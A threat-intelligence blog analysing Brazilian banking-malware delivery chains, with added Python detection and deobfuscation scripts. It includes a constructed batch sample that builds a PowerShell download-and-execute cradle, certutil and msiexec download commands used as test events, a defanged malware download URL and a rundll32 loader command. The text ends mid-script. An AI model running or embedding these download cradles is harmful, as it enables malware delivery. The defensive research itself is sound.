
Research by: Assaf Dahan and Joakim Kandefelt

Executive Summary

For more than a decade, Brazil has been considered a major contributor to global cybercrime. Countless security reports have detailed a plethora of nefarious activities linked to Brazilian threat actors, who mainly target the financial and private sectors. Brazil is particularly known for being home to huge botnets that send out spam and phishing emails and proliferate infostealers and banking Trojans. According to The Spamhaus Project, Brazil is the world's third most botnet-infected country, after India and China.

In 2018, Cybereason's Nocturnus team analyzed numerous campaigns involving several families of Brazilian financial malware. This blog shows the pervasiveness of this Brazilian-made malware, which targets online banking customers of more than 60 banks in nearly a dozen countries across Latin America, Spain and Portugal. It continues the research presented in our earlier blog and maps the evasive infection and delivery methods Brazilian threat actors use to distribute malware.



The campaigns, which target customers of more than 60 banks, deliver different kinds of financial malware. Antivirus vendors have assigned this type of malware generic names such as Banload, Banbra, Bancos, Boleto, Delf and Spy.Banker. Despite the variation in the final payload, Cybereason identified three key stages common to most of the attacks involving Brazilian financial malware.

The multi-stage delivery infrastructure helps the attackers minimize the risk of detection. By implementing various evasive techniques, the attackers bypass signature- and heuristic-based engines, ensuring delivery of the final malware. While multi-stage delivery is not new in cybercrime, its adoption by Brazilian threat actors has proven highly effective at evading many antivirus products, as demonstrated by the low detection rates presented in our research.

In each stage, we observed commonalities in the tactics, techniques and procedures (TTPs) shared across campaigns. These TTPs include:

  • Social engineering as an entry point
  • Multiple redirections via URL shorteners and the usage of Dynamic DNS services
  • Payloads hosted on legitimate online storage services and CDNs (content delivery networks)
  • Obfuscated PowerShell downloaders employing command-line logging evasion
  • Living off the land techniques that abuse Microsoft-signed binaries
  • Abusing trusted applications via DLL hijacking
  • Splitting the main payload into two or more components

Related Post-infection Malware

Our research revealed interesting aspects of the Brazilian malware ecosystem. We observed different types of Brazilian malware being used in conjunction by the same threat actor. On some of the endpoints infected with Brazilian financial malware, we noticed additional Brazilian-made malware, such as infostealers, cryptocurrency miners and malware that steals data from Microsoft Outlook. This finding gives us a glimpse into the different ways threat actors capitalize on a previously gained foothold in order to increase their profits.

Brazilian-made Malware, Spanish-Speaking Targets

Discussing Brazilian financial malware may imply that this threat only targets Brazilian online banking customers, but our research clearly shows that Brazilian threat actors have expanded their operation to Spanish-speaking countries in Latin America and Spain.

Observed targeted countries: Brazil, Argentina, Chile, Bolivia, Colombia, Mexico, Venezuela, Portugal and Spain

Based on data from recent campaigns, Spain is the second most targeted country after Brazil. Other countries targeted in recent campaigns include Mexico, Argentina, Venezuela, Colombia, Bolivia and Chile.

Our research demonstrates how different types of Brazilian-made malware, originally designed to target Brazilian banking users, were repurposed to target other countries and their respective regional banks. We observed references to more than 60 banks embedded within the malware's code. (See the list of targeted banks in this section).

URLs of foreign banks embedded in a Brazilian malware sample

One Source-code, Many variants

Cybereason analysts were able to trace the origin of various Brazilian malware to a Remote Access Tool (RAT) whose source code is publicly available on GitHub. While the identity of the author is known, there is no proof that this author has a direct link to the financial malware discussed in this blog. Cybereason estimates that the publicly available source code was repurposed by different threat actors, who later added the banking modules and anti-analysis features present in the financial malware analyzed here.

Table of Contents

Multi-Stage Delivery Infrastructure

Chained Delivery: an Evasive Network Pattern

Main Entry Point: Phishing Emails

Stage #1: Obfuscated Downloader Scripts

Evading Command-line Detection using Environment Variables

Living Off the Land: Abusing Microsoft-Signed Applications

Stage #2: PowerShell Downloader

Stage #3: Main Payload Execution

Abusing Trusted Applications via DLL-Hijacking

Splitting the Payload - Because Two is Better than One!

Using Rundll32.exe to execute the Main Payload

Related Post-Infection Payloads: Outlook Malware & InfoStealers

Distribution of Additional Malware

Outlook PowerShell Stealer

Contents of Amazon S3 Bucket

Brazilian-made Malware, Spanish-Speaking Targets

Brazilian-Made Malware, Originally made to target Brazilian Users

Back to the Source: Open-Source RAT, Many Variants


Indicators of Compromise



Multi-Stage Delivery Infrastructure

Over the course of 2017-2018, Cybereason observed many variations of the infection flow. However, most infections adhere to a basic formula:

Infection Vector: The infection chain starts with a phishing email masquerading as a legitimate business invoice. The email body usually contains either a link or an attachment (pdf, zip, batch script, html) that will fetch or run the first stage downloader.

Stage 1 - Downloader: An obfuscated script or downloader command (.cmd, .lnk, .vbs, .js) is used to download the second stage payload. The downloader often points to a shortened URL that redirects to a Web hosting service, dynamic DNS or CDN to fetch the second stage payload.

Stage 2 - Downloader: Mostly an obfuscated PowerShell script that downloads the main payload. In some cases the second stage downloader has additional functionality, such as creating persistence and performing anti-analysis checks.

Stage 3 - Main Payload: Main malware payload that steals online banking data from the targeted banks found in the malware configuration. The configuration is either embedded in the binary or downloaded from a command-and-control server. Most payloads are Windows executable binaries, developed in Delphi.


Chained Delivery: an Evasive Network Pattern

During our analysis of these campaigns, Cybereason observed many legitimate services that the threat actors chained together to deliver financial malware: several URL shorteners, dynamic DNS providers, online storage services and CDNs (Brazilian threat actors have been known to use CDNs to deliver malware).

Using these services together makes the generated network traffic appear legitimate, increasing the chance that it will not be flagged by IOC- or heuristic-based engines. The technique seems to bypass many network security products and antivirus programs, and may even mislead some security analysts.

Example 1: Multi-stage delivery as observed in network traffic

URL Shortener → Dropbox → URL Shortener → Facebook CDN → Malicious Site/C2 Gate

Example 2: Multi-stage delivery as observed in network traffic

URL Shortener → Dynamic DNS → URL Shortener → GitHub → Malicious Site/C2 Gate

Common services used as part of the threat actors' infrastructure:

URL shorteners: goo.gl, bit.ly, tinyurl.com, bit.do
Online storage: dropbox.com, sendspace.com, gitlab.com, github.com, amazonaws.com, 000webhostapp.com, pastebin.com, googleusercontent.com
CDNs: cdn77.org, cdn.fbsbx.com (Facebook's CDN)
Dynamic DNS: publiccloud.com.br, ddns.net, game-server.cc (DynDNS), hopto.org, no-ip.org
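As an added example (not code from this post), the following Python script hunts for this chain in web-proxy logs: it groups requests by client and flags any client that hits one of the URL shorteners listed above and then, within a few minutes, two or more of the storage, CDN or dynamic DNS services from the same table. The log lines, client addresses and the four-field log layout are all constructed for the example.

```python
"""Hunt for the chained-redirect delivery pattern in web-proxy logs.

Added example (not code from the Cybereason write-up): it flags a client that
requests a URL shortener and, within a short window, one or more of the
hosting / CDN / dynamic-DNS services listed in the table above.  The log
lines in SAMPLE_LOG are constructed for this example, and the four-field
layout (timestamp, client, host, path) is an assumption about your proxy's
export format.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Domains from the table on this page, grouped by the role they play in the chain.
SERVICE_ROLES = {
    "shortener": {"goo.gl", "bit.ly", "tinyurl.com", "bit.do"},
    "storage": {"dropbox.com", "sendspace.com", "gitlab.com", "github.com",
                "amazonaws.com", "000webhostapp.com", "pastebin.com",
                "googleusercontent.com"},
    "cdn": {"cdn77.org", "cdn.fbsbx.com"},
    "dyndns": {"publiccloud.com.br", "ddns.net", "game-server.cc",
               "hopto.org", "no-ip.org"},
}


def classify_host(host):
    """Return the role of a hostname, or None.  Matching is on the registered
    domain suffix, so s3-eu-west-1.amazonaws.com counts as 'storage' and
    xyz.ddns.net as 'dyndns'."""
    host = host.lower().rstrip(".")
    for role, domains in SERVICE_ROLES.items():
        if any(host == d or host.endswith("." + d) for d in domains):
            return role
    return None


def parse_line(line):
    """Constructed format: '<ISO timestamp> <client> <host> <path>'."""
    ts, client, host, path = line.split(maxsplit=3)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), client, host, path


def find_chains(lines, window=timedelta(minutes=5), min_roles=2):
    """Per client, start at every shortener hit and collect the service roles
    seen in the following `window`.  A chain is reported once the shortener is
    followed by `min_roles` distinct non-shortener roles (e.g. storage, then
    CDN), which is the Example 1 / Example 2 pattern above.  Hits on a second
    shortener inside the window are listed but not counted as a role, so one
    chain produces one alert rather than one per hop."""
    per_client = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, client, host, _path = parse_line(line)
        role = classify_host(host)
        if role:
            per_client[client].append((ts, host, role))

    alerts = []
    for client, events in per_client.items():
        events.sort()
        for i, (ts, host, role) in enumerate(events):
            if role != "shortener":
                continue
            later = [(h, r) for t, h, r in events[i + 1:] if t - ts <= window]
            roles = {r for _, r in later if r != "shortener"}
            if len(roles) >= min_roles:
                alerts.append({"client": client, "start": ts,
                               "chain": [host] + [h for h, _ in later],
                               "roles": sorted(roles)})
    return alerts


# Constructed proxy lines: 10.0.0.5 walks a four-hop chain like Example 1;
# 10.0.0.7 visits GitHub and, much later, a shortener, which is ordinary traffic.
SAMPLE_LOG = """\
2018-08-13T09:12:01 10.0.0.5 bit.ly /2xKq9Zt
2018-08-13T09:12:02 10.0.0.5 www.dropbox.com /s/abc123/2Via-Fatura-13082018.zip?dl=1
2018-08-13T09:12:40 10.0.0.5 goo.gl /aB3cD
2018-08-13T09:12:41 10.0.0.5 cdn.fbsbx.com /v/t59.2708-21/update.msi
2018-08-13T09:15:00 10.0.0.7 github.com /someuser/somerepo
2018-08-13T10:30:00 10.0.0.7 bit.ly /legit
"""

if __name__ == "__main__":
    for alert in find_chains(SAMPLE_LOG.splitlines()):
        print(alert["client"], alert["start"], " -> ".join(alert["chain"]))
```

Run as a script it prints one line per chain. A lone shortener hit followed by a single hosting service is deliberately not enough to alert, which keeps ordinary link-shortener use quiet; extend SERVICE_ROLES with the shortener and dynamic DNS providers seen in your own environment (zapto.org, the parent domain of the C2 host shown later on this page, is one candidate).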

Example of a first stage payload hosted on GitLab: the archive's extracted content is an obfuscated .cmd scriptlet with a very low detection rate.

Main Entry Point: Phishing Emails

Cybereason found that phishing emails were used for the initial infection. The email body usually contains either an attachment or a link to a URL shortener that points to hosting websites where the first stage payload is stored. The payloads often masquerade as Flash/Java updates.

Most emails share a similar subject line and purport to be invoices ("FATURA" in Portuguese). Another common theme is spoofing emails so they appear to come from VIVO, Brazil's largest telecommunications company.

Example 1: Spoofed VIVO Emails and Fake Invoices

The infection chain starts after the user opens the PDF attached to the spoofed email (SHA-1: 86C7312D9E786D89FC12973B7584F6CAF39805C3).

Examination of the PDF reveals a stream containing a shortened URL.

Once the user clicks anywhere on the PDF, the embedded code fires a request to the shortened URL, which at the time of detection had zero antivirus detections.

The URL resolves to a Dropbox URL hosting a ZIP file that contains the first stage downloader script:

File name: 2Via-Fatura-13082018.zip

Example 2: .lnk file downloaded from a Web-hosting website

In one recently observed campaign, the victims were led to a file-sharing website URL and encouraged to download a ZIP file.

The ZIP file holds a .lnk file (arq1561.lnk) that contains an obfuscated downloader payload (SHA-1: 3723E2A328AAFB359116DFC987222C5001BF59D7).

Once the user clicks the .lnk file, it spawns cmd.exe and powershell.exe processes, which download a secondary payload.

Additionally, an Internet Explorer instance launches and loads a legitimate Adobe website, probably to allay any suspicion the user has about the downloaded file and to distract them from what is going on in the background.

Stage 1: Obfuscated Downloader Scripts

In 70 percent of the infections, the infection chain traces back to three main file extensions: .bat, .cmd and .lnk. The scripts are usually contained in an archive (.rar/.zip) to bypass email and spam filters. In addition to the batch files, we also observed other extensions, such as .exe (Windows executable) and .chm (compiled HTML help), sent as email attachments.

Bundling the downloaders in archives proved highly effective at bypassing antivirus products. Many of the analyzed payloads had a low detection rate, between 0 and 17 of 59 antivirus engines.

Examples of payloads received in phishing emails with a low antivirus detection rate

Evading Command-line Detection using Environment Variables

Most of the first stage payloads consisted of an obfuscated script or a set of obfuscated commands. The batch script we analyzed uses an obfuscation that gradually builds up its payload, as detailed in this blog: the PowerShell payload is assembled into an environment variable (in this case a variable called "system").

This obfuscation type appears to be adopted from Daniel Bohannon's Invoke-Obfuscation project. Once PowerShell is executed, the actual downloader payload does not appear in the process' command-line arguments:

PowerShell command-line arguments: -nop -win 1 -

The trailing "-" tells powershell.exe to read its script from standard input, so the command line records nothing but the profile and window switches; the batch script echoes the variable's contents into the PowerShell process instead. By examining the environment variables at runtime, however, one can observe the downloader command stored in the "system" environment variable.

Based on our observations, this technique is widely used by Brazilian threat actors and is yet another testimony to their efforts to evade both static detection (through obfuscation) and detection based on command-line logging (through environment variables).

Living Off the Land: Abusing Microsoft-Signed Applications

The Brazilian threat actors seem keenly aware of the trendy usage of Microsoft-signed and trusted binaries (aka LOLBins) to download or execute payloads. In addition to the commonly seen PowerShell and Windows script engines, we observed other Microsoft binaries being used across different campaigns.

Example #1: Using msiexec.exe as a Downloader

The .lnk file in this example spoofs an Internet Explorer shortcut. Once executed, its target command invokes Microsoft's msiexec.exe with a shortened URL, so the secondary payload is downloaded, extracted and executed by msiexec itself.

The shortened URL resolves to a URL on Facebook's CDN (cdn.fbsbx.com).

The downloaded payload is an MSI package that serves as a container: it deploys "windows.bat" in %appdata%. The batch file's deobfuscated payload is a PowerShell downloader command stored in an environment variable ("day").

This downloader fetches another PowerShell payload, which ultimately drops the main payload.

Example #2: Using Certutil as a Downloader

The RAR archive in this example contains a .lnk file which, upon execution, downloads a payload using Microsoft's certutil.exe with the "-urlcache" and "-f" flags (fetch the URL and write the response to the given file; -f forces a fresh fetch rather than serving it from the local URL cache).

The executed command downloads and launches a batch file, the secondary downloader.

Example #3: Using Certutil to Decode base64 Payloads

We observed a .lnk file that included a command using Microsoft's certutil.exe (-decode) to decode a base64 payload to disk.

The decoded payload is further obfuscated with simple caret obfuscation (^), which cmd.exe strips before execution.

The deobfuscated command downloads a secondary payload.
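Both the environment-variable trick described under "Evading Command-line Detection using Environment Variables" and the caret obfuscation in this example can be undone without executing anything. The script below, an added example rather than code from the post, emulates just enough of cmd.exe (set, %var% expansion including the :~start,len substring form, caret escapes and & separators) to replay a first stage script and recover what gets echoed into powershell.exe's standard input. SAMPLE_BAT is a constructed script in the same style with a placeholder URL, not one of the page's samples.

```python
"""Emulate the small subset of cmd.exe that the Stage 1 scripts rely on.

Added example, not code from the Cybereason post.  The scripts described
above build their PowerShell payload with `set` statements, `%var:~start,len%`
substring expansion and caret (^) escapes, then hand it to powershell.exe
through an environment variable and stdin so that the command line shows
only `-nop -win 1 -`.  This emulator replays the `set` lines, expands the
variables and strips the carets, returning the final environment and the
expanded commands.  SAMPLE_BAT is a constructed script in that style with a
harmless placeholder URL; it is not one of the page's samples.
"""
import re

# %%                -> literal %
# %name%            -> value (empty if undefined, as inside a batch file)
# %name:~start,len% -> substring (negative start/len count from the end)
# %name:old=new%    -> replacement
VAR_RE = re.compile(
    r"%(?P<pct>%)|"
    r"%(?P<name>[^%:]+?)(?::~(?P<start>-?\d+)(?:,(?P<len>-?\d+))?"
    r"|:(?P<old>[^=%]+)=(?P<new>[^%]*))?%"
)


def _substring(value, start, length):
    begin = start if start >= 0 else max(len(value) + start, 0)
    if length is None:
        return value[begin:]
    if length >= 0:
        return value[begin:begin + length]
    return value[begin:len(value) + length]


def expand(text, env):
    """Expand %var% references the way cmd.exe does before a line executes.
    Variable names are case-insensitive, so env keys are stored lower-cased."""
    def repl(m):
        if m.group("pct"):
            return "%"
        value = env.get(m.group("name").lower(), "")
        if m.group("start") is not None:
            length = int(m.group("len")) if m.group("len") is not None else None
            return _substring(value, int(m.group("start")), length)
        if m.group("old") is not None:
            return value.replace(m.group("old"), m.group("new"))
        return value
    return VAR_RE.sub(repl, text)


def split_commands(line):
    """Split a line on unescaped & / && outside double quotes and drop the
    escape carets, so `set a=po^wer&set b=x` becomes ['set a=power', 'set b=x'].
    A pipe (|) stays inside its command; it matters for the stdin trick."""
    commands, current, in_quotes, i = [], [], False, 0
    while i < len(line):
        ch = line[i]
        if ch == "^" and not in_quotes and i + 1 < len(line):
            current.append(line[i + 1])          # escaped character, taken literally
            i += 2
            continue
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "&" and not in_quotes:
            if line.startswith("&&", i):
                i += 1
            commands.append("".join(current).strip())
            current = []
            i += 1
            continue
        current.append(ch)
        i += 1
    commands.append("".join(current).strip())
    return [c for c in commands if c]


def emulate_batch(script):
    """Return (environment, executed_commands) for a batch script."""
    env, executed = {}, []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("::") or line.lower().startswith("rem "):
            continue
        line = expand(line, env)                 # the whole line expands before it runs
        for cmd in split_commands(line):
            cmd = cmd.lstrip("@").strip()
            if cmd.lower().startswith("set "):
                body = cmd[4:].strip()
                if body.startswith("/"):         # set /a and set /p are not emulated
                    continue
                if body.startswith('"') and body.endswith('"'):
                    body = body[1:-1]
                name, _, value = body.partition("=")
                env[name.strip().lower()] = value
            else:
                executed.append(cmd)
    return env, executed


def recover_stdin_payloads(commands):
    """Find `echo <payload>|powershell ... -` pipelines: the bare trailing '-'
    makes powershell.exe read its script from stdin, so the payload never
    appears in its own command line, only in what is echoed into it."""
    payloads = []
    for cmd in commands:
        if "|" not in cmd:
            continue
        left, right = cmd.rsplit("|", 1)
        tokens = right.split()
        if tokens and "powershell" in tokens[0].lower() and tokens[-1] == "-":
            payload = left.strip()
            if payload.lower().startswith("echo "):
                payload = payload[5:]
            payloads.append(payload)
    return payloads


# Constructed sample in the style of the Stage 1 scripts (placeholder URL).
SAMPLE_BAT = r"""
@echo off
set m=wbinarxgpowershellqq&set k=nop
set u=I^EX (New-Object Net.Web^Client).Down^loadString('http://example.invalid/s2.txt')
set system=%u:~0,3% %u:~4%
echo %system%|%m:~8,10% -%k% -win 1 -
"""

if __name__ == "__main__":
    env, cmds = emulate_batch(SAMPLE_BAT)
    print("system =", env["system"])
    print("stdin payloads:", recover_stdin_payloads(cmds))
```

The same emulator output covers the other Invoke-Obfuscation launcher shape, where the command line carries an `IEX (Get-Item env:name).Value` reference instead of a bare dash: the variable named on the command line is simply looked up in the returned environment.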



Stage #2: PowerShell Downloader


Our investigation showed variation in the types of second stage downloaders across campaigns. The main purpose of a second stage downloader is to fetch an additional payload, in many cases the main payload. Some secondary downloaders had additional capabilities, such as creating persistence, bypassing UAC and performing anti-analysis checks.

Example #1: Persistence and fetching a secondary payload

The following second stage downloader is a PowerShell script that checks for an existing infection, drops a batch file that checks for values in the registry, drops a .lnk file pointing to that batch file for persistence, and fetches a secondary XOR-encrypted payload from the same remote server. The script has a low detection rate (3/54).

Initially, the script checks for a likely previous infection by searching %temp% for a file named after the day's date (in the form yyyymmdd); if the file is absent, it downloads a bitwise XOR-encrypted payload.

The batch file is built dynamically by the PowerShell script, again using environment variables, as seen in other instances across the different campaigns.

The .lnk file is created through the Windows Script Host WScript.Shell COM object and is used for persistence: when executed, it launches the batch file (the $cmdFileName variable holds the batch file's path).

The script uses a scheduled task to bypass UAC (User Account Control). The created batch file is executed once and the task is then deleted, to leave as little evidence as possible.

Example #2: Obfuscated Downloader with Anti-Virtual-Machine Checks

While analyzing an incident, we found the following PowerShell script, which looked different from the previous downloader. The script was likely obfuscated with the ISESteroids PowerShell extension, which provides a built-in obfuscation feature. The script had a particularly low detection rate (2/57).

After deobfuscation, this downloader turned out to perform a few anti-virtual-machine checks. These checks are part of the threat actors' evasion techniques and attempt to prevent researchers from studying the main payload. The script uses WMI to query for the strings of these virtualization products: VirtualBox, VMware Virtual Platform, Virtual Machine, HVM DOMU.

Once the "coast is clear", the script creates persistence via a .lnk file, which executes the malware via rundll32.exe.


Stage #3: Main Payload Execution

The campaigns' main payloads consisted mostly of common Brazilian malware that antivirus vendors generically name Banload, Banbra, Bancos, Boleto, Delf and Spy.Banker. Brazilian financial malware is known for its effectiveness in overcoming multi-factor authentication (MFA): it uses overlay screens, as previously shown, together with social-engineering tricks to extract SMS codes and other security token information from the victim.

Cybereason identified variations in the way that the main payloads were executed. In this part, we will examine executions that involve abuse of trusted third-party applications via DLL hijacking as well as using built-in Microsoft-signed binaries (also known as “LOLBins”) to execute the malware code. Using these techniques lowers the risk of detection.

Abusing Trusted Applications via DLL-Hijacking

As discussed in an earlier blog, the Brazilian threat actors seem quite fond of leveraging DLL-hijacking techniques against trusted security vendors, including Avira and McAfee, and trusted technology companies like VMware, NVIDIA, HP, Realtek and Adobe.

Splitting the payload - Because Two is Better than One!

We noticed that the Brazilian threat actors evolved how they implemented DLL-hijacking. Earlier infections that used this technique implemented a classic approach of deploying a vulnerable trusted binary along with a fake DLL. This TTP was previously documented being used in the context of Brazilian financial malware. In some cases, the fake DLL was even signed with revoked or self-signed certificates in an attempt to further lower the possibility of detection.

Newer samples observed in 2017 and 2018 added another layer of evasion by splitting the malware payload into two components:

  1. Loader: A fake DLL that loads the encrypted malware payload into memory, decrypts it and executes it.
  2. Malware payload: An encrypted file that cannot run on its own and depends on the loader.

This codependency between the loader and the encrypted payload makes detection and analysis harder. For the malware to run, both files must reside in the same folder. In most cases, the loader DLL will also validate that it is running in the context of the vulnerable application, or else it will crash.
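Two cheap file-level checks follow from this design, shown here as an added example (not code from the post): a file whose extension says "PE" but which does not begin with the MZ signature is not what its name claims (the encoded .mui in the Avira case below is exactly that), and an encrypted companion sitting next to a signed binary has a near-uniform byte distribution that plain text and ordinary code never reach. The directory snapshot, file names and contents in the block are constructed stand-ins, and the script is a triage helper a responder could run over a drop folder, not the loader's own logic.

```python
"""Triage a dropped-file set for the loader + encrypted-companion pattern.

Added example, not code from the Cybereason post.  Given a snapshot of a
directory ({file name: bytes}), it reports (a) files whose extension normally
belongs to a PE image (.dll, .exe, .mui, .ocx, .sys, .cpl) but which do not
start with the 'MZ' signature, and (b) non-PE files with near-random byte
distribution sitting next to a PE, which is what an encrypted payload such
as a .toib or .prx looks like on disk.  The contents in SAMPLE_DIR are
constructed: 'MZ' stubs stand in for the real PE files and the blob is
seeded pseudo-random data.
"""
import math
import random
from collections import Counter

PE_EXTENSIONS = {".dll", ".exe", ".mui", ".ocx", ".sys", ".cpl"}
HIGH_ENTROPY = 7.2          # bits per byte; text and most code sit well below this
MIN_BLOB_SIZE = 256         # tiny files give unstable entropy estimates


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for empty input, up to 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def is_pe(data):
    return data[:2] == b"MZ"


def _ext(name):
    dot = name.rfind(".")
    return name[dot:].lower() if dot > 0 else ""


def triage_directory(snapshot):
    """Return a list of (file name, reason) findings for one directory."""
    findings = []
    has_pe = any(is_pe(d) for d in snapshot.values())
    for name, data in snapshot.items():
        if _ext(name) in PE_EXTENSIONS and not is_pe(data):
            findings.append((name, "extension implies a PE image but the MZ header is missing"))
        entropy = shannon_entropy(data)
        if has_pe and not is_pe(data) and len(data) >= MIN_BLOB_SIZE and entropy >= HIGH_ENTROPY:
            findings.append((name, "high-entropy non-PE companion (%.2f bits/byte) beside a PE" % entropy))
    return findings


def _blob(n, seed):
    """Deterministic pseudo-random bytes standing in for an encrypted payload."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed snapshot modelled on the Avira drop set below; contents are stand-ins.
SAMPLE_DIR = {
    "reymr.exe": b"MZ" + b"\x00" * 510,
    "avira.oe.nativecore.dll": b"MZ" + b"\x00" * 510,
    "msvcr120.dll": b"MZ" + b"\x00" * 510,
    "RestartManagerUninstall.mui": _blob(4096, seed=7),
    "readme.txt": b"Fatura em anexo. " * 40,
}

if __name__ == "__main__":
    for name, reason in triage_directory(SAMPLE_DIR):
        print(name, "-", reason)
```

The entropy check on its own also fires on legitimate compressed or encrypted data (archives, media, certificate stores), which is why it is only raised when a PE image shares the folder; the missing-MZ check has no such ambiguity, since a real .mui resource file is itself a PE image.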

Example #1: Remote Overlay RAT Abusing Avira via DLL Hijacking

An email attachment sent to a user contained a .lnk file, which executed commands that led to the download of a binary (reymr.exe).

The binary is a signed Avira product renamed by the attackers, as indicated by its file metadata (see the VirusTotal entry for the SHA-1 below).

Further investigation showed that along with reymr.exe, the PowerShell script also dropped the following files:

File Name | Purpose | SHA-1
reymr.exe | Legitimate, signed Avira.SystrayStartTrigger binary | 762BF93E6265B4E74BD0BFCAA447F1A619DB2F58
msvcr120.dll | Legitimate Microsoft C Runtime Library | F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
msvcp120.dll | Legitimate Microsoft C Runtime Library | EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
avira.oe.nativecore.dll | Malicious DLL planted for DLL search-order hijacking; decrypts the contents of RestartManagerUninstall.mui | 312F4DC26FD0C277F9727CE3B943123CBEB127C1
RestartManagerUninstall.mui | Encoded blob carrying the Trojan functionality, loaded by avira.oe.nativecore.dll | 9A944B0933F004DB012DB202BF5C2BE1E231FBB5

reymr.exe lists avira.oe.nativecore.dll in its import table, and Windows resolves an imported DLL from the application's own directory before the system directories. Once reymr.exe is executed, it therefore loads the fake DLL (avira.oe.nativecore.dll), which decrypts and runs the malware payload (RestartManagerUninstall.mui).

The main payload was identified as the Remote Overlay RAT, previously discussed here.

Using Rundll32.exe to execute the Main Payload

In some recent spam campaigns that we monitored, the malware authors favored the built-in rundll32.exe to launch the loader DLL. Once the DLL is executed, it loads and decrypts a second (sometimes even a third) encrypted binary, which is the malware's main payload.

Example #1: Financial Trojan launched by Rundll32

In this example, a PowerShell process spawned by cmd.exe as a result of a .lnk file execution downloads a secondary payload from a malicious website:

Download URL: hxxp://barca21[.]zapto[.]org/barca21/vx1.txt

The PowerShell payload drops and extracts a ZIP file containing the following files:

File Name | Purpose | SHA-1
Yaew.toib | Loader binary (DLL); exported function OCSVFWBO56, invoked by the rundll32 command below | 3F9E9BD8330660B0DA23EE8D54787A44E53DDF65
Yaew1.toib | Encrypted financial Trojan payload (DLL) | 87DBACFE8727B9DA1EACE101BEE84D06388FA7B6
G | Encryption & configuration data | D5E3969BB36A675CF9CE60A88ABB5C8DE7C3BD80

Command line:

"C:\Windows\System32\rundll32.exe" C:\Users\Public\YAEW.TOIB ,,, OCSVFWBO56

Note that the module handed to rundll32 carries a .toib extension and lives in C:\Users\Public; rundll32 does not require a .dll extension, so the loader runs regardless, and both traits are useful detection hooks.

The unpacked payload seems to be a variant of a Brazilian Remote Overlay RAT.
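The LOLBin downloaders under "Living Off the Land" (certutil -urlcache, certutil -decode, msiexec with a URL, powershell reading its script from stdin) and the rundll32 launch in this example share one detection surface: process-creation events. The rule set below is an added example, not code from the post; it assumes events already normalized to image, parent and cmdline fields, which Sysmon event 1 and Windows event 4688 both provide. All events are constructed except the rundll32 command line, which is copied from above.

```python
"""Rule set for process-creation events covering the LOLBin and rundll32
patterns documented on this page.

Added example, not code from the Cybereason post.  Events are dicts with
'image', 'parent' and 'cmdline' keys (an assumption about your normalized
telemetry).  SAMPLE_EVENTS are constructed, apart from the rundll32 command
line, which is the one shown in the write-up.
"""
import ntpath
import re

REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")


def tokens(cmdline):
    """Split a Windows command line, keeping quoted paths as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def check_certutil(toks):
    opts = {t.lower().lstrip("-/") for t in toks[1:]}        # certutil accepts -opt and /opt
    if "urlcache" in opts and any(REMOTE_URL.match(t) for t in toks):
        return "certutil -urlcache fetching a remote URL to disk (downloader)"
    if "decode" in opts:
        return "certutil -decode turning a base64 text file into a binary"
    return None


def check_msiexec(toks):
    if any(REMOTE_URL.match(t) for t in toks[1:]):
        return "msiexec installing a package straight from a remote URL"
    return None


def check_powershell(toks):
    findings = []
    if "-" in toks[1:]:
        findings.append("powershell reading its script from stdin (bare '-'): the payload is "
                        "not on this command line, check the parent's command line and "
                        "environment block")
    low = [t.lower() for t in toks[1:]]
    for i, t in enumerate(low):
        if t in ("-w", "-win", "-windowstyle") and i + 1 < len(low) and low[i + 1] in ("1", "hidden"):
            findings.append("powershell launched with a hidden window")
    return "; ".join(findings) or None


def check_rundll32(toks):
    if len(toks) < 2:
        return None
    module = toks[1].split(",")[0]       # "module,Export" may arrive as one token
    low = module.lower()
    findings = []
    if ntpath.splitext(low)[1] != ".dll":
        findings.append("rundll32 loading a module without a .dll extension (%s)" % ntpath.basename(module))
    if any(marker in low for marker in USER_WRITABLE):
        findings.append("rundll32 module lives in a user-writable directory")
    return "; ".join(findings) or None


RULES = {
    "certutil.exe": check_certutil,
    "msiexec.exe": check_msiexec,
    "powershell.exe": check_powershell,
    "rundll32.exe": check_rundll32,
}


def analyze(event):
    """Return the finding for one event, or None if no rule matched."""
    rule = RULES.get(ntpath.basename(event["image"]).lower())
    if rule is None:
        return None
    finding = rule(tokens(event["cmdline"]))
    if finding and ntpath.basename(event.get("parent", "")).lower() in ("cmd.exe", "powershell.exe"):
        finding += " (parent is a script host, consistent with a .lnk/.cmd lure)"
    return finding


def scan(events):
    """Map event index -> finding for every event that trips a rule."""
    results = {}
    for i, event in enumerate(events):
        finding = analyze(event)
        if finding:
            results[i] = finding
    return results


CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events; the rundll32 command line is the one from the page.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe", "parent": CMD,
     "cmdline": r"certutil -urlcache -split -f http://example.invalid/s1.txt C:\Users\Public\s1.bat"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": CMD,
     "cmdline": r"certutil -decode C:\Users\Public\b64.txt C:\Users\Public\stage.cmd"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": CMD,
     "cmdline": r"msiexec /q /i http://example.invalid/update.msi"},
    {"image": PS, "parent": CMD, "cmdline": "powershell -nop -win 1 -"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent": PS,
     "cmdline": r'"C:\Windows\System32\rundll32.exe" C:\Users\Public\YAEW.TOIB ,,, OCSVFWBO56'},
    # Two benign events that should stay quiet.
    {"image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": CMD,
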